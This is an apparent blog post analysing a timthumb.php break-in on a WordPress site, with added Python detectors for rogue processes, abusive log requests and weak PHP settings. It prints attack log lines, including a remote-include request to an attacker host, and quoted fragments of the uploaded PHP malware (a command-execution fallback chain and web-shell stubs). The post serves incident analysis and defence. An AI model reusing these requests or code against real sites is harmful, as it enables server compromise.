I already wrote an article this week about the timthumb.php vulnerability, which allows hackers to upload and execute files via Wordpress blogs.
Last time the hack took me by surprise; this time I was prepared. I had set up special monitoring for new processes, and tonight the trap worked. At 20:06 a fake process was launched by www-data:
# ps auxf | grep www
root 16995 0.0 0.0 87856 716 pts/0 S+ 21:00 0:00 \_ grep www
www-data 7170 0.0 0.9 225316 40088 ? S 14:06 0:00 \_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ? Sl 17:37 29:36 \_ /usr/sbin/apache2 -k start
www-data 2594 14.3 9.0 1022848 366568 ? Sl 18:30 21:24 \_ /usr/sbin/apache2 -k start
www-data 6318 11.5 9.0 1088992 364764 ? Sl 19:13 12:19 \_ /usr/sbin/apache2 -k start
www-data 11256 0.0 0.0 0 0 ? Z 20:06 0:00 \_ [sh]
www-data 11260 97.5 0.1 24592 5336 ? R 20:06 52:26 /usr/sbin/httpd
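A check like the one that caught this can be scripted. The following is an added example written for this post, not the author's own monitoring setup: it parses a ps auxf listing and reports every www-data process whose executable is not the expected apache2 binary, so a [sh] zombie or a fake httpd stands out. The listing is a constructed sample modelled on the output above, and the allow-list assumes a Debian-style apache2 install.

```python
import re

# Constructed sample in the layout of `ps auxf` above (not the original listing).
PS_SAMPLE = """\
USER       PID %CPU %MEM    VSZ    RSS TTY   STAT START   TIME COMMAND
www-data  7170  0.0  0.9 225316  40088 ?     S    14:06   0:00  \\_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ?    Sl   17:37  29:36  \\_ /usr/sbin/apache2 -k start
www-data 11256  0.0  0.0      0      0 ?     Z    20:06   0:00  \\_ [sh]
www-data 11260 97.5  0.1  24592   5336 ?     R    20:06  52:26 /usr/sbin/httpd
root     16995  0.0  0.0  87856    716 pts/0 S+   21:00   0:00  \\_ grep www
"""

# Executables the web server user is expected to run (assumption: Debian-style apache2 install).
ALLOWED_EXES = {"/usr/sbin/apache2"}

def suspicious_processes(ps_output, user="www-data", allowed=ALLOWED_EXES):
    """Return (pid, state, command) for each process of `user` whose executable is
    not on the allow-list: a [sh] zombie left by popen() or a fake 'httpd' show up here."""
    hits = []
    for line in ps_output.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 10)                 # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(fields) < 11 or fields[0] != user:
            continue
        pid, state = int(fields[1]), fields[7]
        cmd = re.sub(r"^\s*\\_\s*", "", fields[10])   # drop the process-tree prefix added by -f
        if cmd.split()[0] not in allowed:
            hits.append((pid, state, cmd))
    return hits

if __name__ == "__main__":
    for pid, state, cmd in suspicious_processes(PS_SAMPLE):
        print(f"pid {pid} state {state}: {cmd}")
```

Run it from cron against the live ps output and alert on a non-empty result; the allow-list will need the FastCGI or PHP-FPM binary if the site uses one.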
After a quick look through the access logs, I found the following entries:
184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/1.1" 400 582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200 139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=backup HTTP/1.1" 200 66 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=check HTTP/1.1" 200 135 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/inc.php HTTP/1.1" 200 126 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:40 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=patch HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
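Two things in that log are worth detecting automatically: a timthumb src whose host merely contains an allowed domain name (picasa.com as a prefix of an attacker-controlled host), and PHP being served out of the cache directory. The following is an added example, not part of the original post, that runs over constructed log lines in the same format; the addresses, hostnames and cache hash are placeholders, and the allowed-host list is an assumption standing in for timthumb's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log line: client IP, timestamp, request line and status are all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed lines in the format of the log above; addresses and hostnames are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.attacker.invalid/patcherfinal.php HTTP/1.1" 400 582 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_0123456789abcdef0123456789abcdef.php?act=uname HTTP/1.1" 200 139 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Nov/2011:20:10:01 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 4011 "-" "Mozilla/5.0"
"""

# Stand-in for the list of hosts timthumb may fetch images from (assumption, not the shipped list).
ALLOWED_IMAGE_HOSTS = ("picasa.com", "img.youtube.com", "flickr.com")

def host_allowed(host, allowed=ALLOWED_IMAGE_HOSTS):
    """Exact or subdomain match. A plain substring test ('picasa.com' in host) is what
    lets picasa.com.<attacker-domain> through; this check does not."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in allowed)

# timthumb names fetched files external_<md5>.php in its cache dir; nothing there should be PHP.
CACHE_PHP = re.compile(r"/cache/external_[0-9a-f]{32}\.php$")

def find_timthumb_abuse(log_text):
    """Flag timthumb fetches from untrusted hosts and PHP executed out of the cache dir."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        q = parse_qs(url.query)
        if url.path.endswith("timthumb.php") and "src" in q:
            src_host = urlsplit(q["src"][0]).hostname or ""
            if not host_allowed(src_host):
                events.append((m["ip"], m["ts"], "remote src from untrusted host " + src_host))
        elif CACHE_PHP.search(url.path):
            events.append((m["ip"], m["ts"], "php run from cache dir, act=" + q.get("act", ["-"])[0]))
    return events
```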
As soon as I saw timthumb.php in the log, I knew which hack this was. But this time it was a little different. In the last post only a single command was executed and the uploaded PHP file was rather small. This time the PHP file fetched from http://picasa.com.thomaswdufour.com/patcherfinal.php was rather big and even opens new sockets.
The file again starts with binary data (a GIF89a header), like this:
GIF89a????????!?????,???????D?;?// Coded [c] 2011 by v0ld3m0rt
// Unknown Indonesian H4xx0r
error_reporting(0);
$uname = php_uname();
$htaccess = "PEZpbGVzIH4gIlwuKHBocHxwaHAzfGNnaXxwaHA0fHBocDUpJCI+DQogIGRlbnkgZnJvbSBhbGwNCjwvRmlsZXM+";
$data = "PD9waHANCi8qIFdTTyAyLjEgKFdlYiBTaGVsbCBieSBvUmIpICovDQppZighZmlsZV9leGlzdH....
But the more interesting part comes at the end:
// Tries every command-execution primitive in turn; whichever one is not disabled is used.
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {   // last resort: popen() is often left enabled
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
// Appends arbitrary content to a file on the server (used to drop the other files).
function CreateFile($path, $content)
{
    $handle = fopen($path, "a+");
    fwrite($handle, $content);
    fclose($handle);
}
You can take a look at the full file here: external_patcherfinal.txt
The PHP script lets the hacker execute commands on the server through the functions passthru, system and shell_exec. But those functions are disabled on my server.
However, by using the function popen, a forked command (in this case a bot) could still be launched, and that is what happened right after the upload:
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=infect&bot=[somebinarycode] HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
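Whether the fallback chain in ex() finds a way through depends entirely on disable_functions. The following is an added example, not from the post, that parses a php.ini fragment and reports which function of that chain would still work. Both ini fragments are constructed: the first is consistent with the situation described above (popen left enabled), the second also disables popen and proc_open, the other standard way for PHP to spawn a process.

```python
import re

# The fallback chain the uploaded script tries, in the order shown above, plus proc_open.
EXEC_FAMILY = ("exec", "passthru", "system", "shell_exec", "popen", "proc_open")

# Constructed php.ini fragments (not the server's real configuration).
WEAK_INI = """
; ... other settings ...
disable_functions = exec,passthru,system,shell_exec
"""
HARDENED_INI = """
disable_functions = exec,passthru,system,shell_exec,popen,proc_open
"""

def disabled_functions(ini_text):
    """Parse disable_functions from php.ini-style text; a later assignment overrides an earlier one."""
    names = set()
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()          # drop ini comments
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.I)
        if m:
            value = m.group(1).strip().strip('"\'')
            names = {n.strip().lower() for n in value.split(",") if n.strip()}
    return names

def first_usable_exec(ini_text, chain=EXEC_FAMILY):
    """Return the first function in the script's chain that is not disabled, or None."""
    disabled = disabled_functions(ini_text)
    return next((f for f in chain if f not in disabled), None)

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{label}: script would use {first_usable_exec(ini)}")
```

Point it at the php.ini actually loaded by the web server (php --ini shows the path), since a per-vhost or .user.ini override can differ from the global file.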
It doesn't stop here. As one can see in the access log, another file, 'inc.php', was accessed as well. Opened in a browser, it looks like this:
The file starts with the following code:
/* WSO 2.1 (Web Shell by oRb) */
if(!file_exists("data.php")) {
    WriteData();
Interesting: a PHP shell was uploaded. Let's take a look at it by modifying the password function:
Using this web shell, other files can be uploaded, executed, overwritten, and so on.
Two more files were found in the same directory: data.php and, in the cache folder, a file called 'sex'. The 'sex' file was actually a Perl script, most probably executed through the shell, and this is the source of the fake Apache process discovered at first.